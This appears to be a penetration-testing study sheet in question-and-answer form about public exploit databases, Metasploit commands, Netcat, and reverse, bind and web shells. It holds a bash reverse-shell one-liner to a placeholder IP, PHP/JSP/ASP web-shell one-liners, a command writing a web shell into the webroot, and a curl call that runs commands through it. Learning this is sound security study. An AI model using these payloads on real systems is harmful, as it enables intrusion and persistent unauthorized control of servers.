Public Exploits

Question 1

What are some Online databases we can use for finding public exploits

Answer 1

Exploit DB

Rapid7 DB

Vulnerability Lab

Question 2

Metasploit command to search for target vulnerability for an application

Answer 2

search exploit

Question 3

Metasploit command to see all filters that go with the search command

Answer 3

help search

Question 4

Metasploit command to view options available to configure an exploit

Answer 4

show options command

Question 5

Metasploit command to see if the server is vulnerable to the exploit.

Answer 5

check

Question 6

Shell that connects back to our system and gives us control through a reverse connection.

Answer 6

Reverse Shell

Question 7

Syntax for Netcat listener

Answer 7

nc –lvnp (port number)

Question 8

Netcat flag for listen mode, waits for a connection to connect to us.

Answer 8

-l

Question 9

Netcat flag to disables DNS resolution and only connects from/to IPs, speeding up the connection

Answer 9

-n

Question 10

Example of what is used with exploits to get a reverse connection in Bash

Answer 10

bash -c ‘bash -i >& /dev/tcp/10.10.10.10/1234 0>&1’

Question 11

Listening port on the target waits for us to connect to a shell and gives us control once we do.

Answer 11

Bind shell

Question 12

Netcat syntax for connecting to a bind shell setup on our target box.

Answer 12

nc (IP) (target port)

Question 13

To get full functionality in for our terminal shell (e.g. access command history) we need to do what?

Answer 13

Upgrade TTY

Question 14

Communicates through a web server, accepts our commands through HTTP parameters (GET request), executes them, and prints back the output.

Answer 14

Web shell

Question 15

Web shell scripts are typically one-liners. What are some common ones in different web languages”

Answer 15

php

<?php system($_REQUEST[“cmd”]); ?>

jsp

<% Runtime.getRuntime().exec(request.getParameter(“cmd”)); %>

asp

<% eval request(“cmd”) %>

Question 16

How do we execute web shell?

Answer 16

We take this web shell place it into the remote host’s web directory and execute it through the web browser. To do this through a vulnerability in an upload feature.

Question 17

Some other places we can write web shells directly to.

Answer 17

Webroot

Question 18

If we’re on a box command we can determine which webroot is in use:

Answer 18

echo ‘<?php system($_REQUEST[“cmd”]); ?>’ > /var/www/html/shell.php

Question 19

After writing a web shell, we can access it through where?

Answer 19

Browser

CURL

Question 20

How to execute a web shell through a browser?

Answer 20

Go to the URL page where web shell is located and start executing commands.

e.g. https://SERVER_IP_PORT/shell.php?cmd-id

Question 21

How to execute a web shell through CURL?

Answer 21

curl http://SERVER_IP:PORT/shell.php?cmd=id

uid=33(www-data) gid=33(www-data) groups=33(www-data)

Question 22

What are some pros of a web shells?

Answer 22

Bypassing any firewall restrictions because they run on a web port 80 or 443

Persistence - If the target host is compromised rebooted, we would still have a connection. Because web shell script would still be in place.

Question 23

What are some cons of a web shells?

Answer 23

Cons it’s not as interactive as reverse and bind shells since we must keep requesting a different URL to execute our commands.